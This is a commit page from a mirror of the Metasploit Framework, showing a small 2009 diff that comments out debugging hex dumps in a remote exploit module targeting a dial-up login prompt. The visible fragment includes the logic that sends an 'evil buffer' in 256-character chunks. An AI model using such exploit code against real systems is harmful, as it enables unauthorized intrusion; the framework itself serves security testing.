1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Disabled debugging output

git-svn-id: file:///home/svn/framework3/trunk@6727 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
druid 2009-06-30 01:52:48 +00:00
parent f14de093ed
commit e03428dd8f

View File

@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Waiting for login prompt")
res = dialup_expect(/ogin:\s/i, 10)
puts Rex::Text.to_hex_dump(res[:buffer])
#puts Rex::Text.to_hex_dump(res[:buffer])
if not res[:match]
print_error("Login prompt not found... Exiting.")
disconnect_dialup
@ -179,7 +179,7 @@ class Metasploit3 < Msf::Exploit::Remote
# send the evil buffer, 256 chars at a time
print_status("Sending evil buffer...")
puts Rex::Text.to_hex_dump(buf)
#puts Rex::Text.to_hex_dump(buf)
# dialup_puts(buf)
len = buf.length
p = 0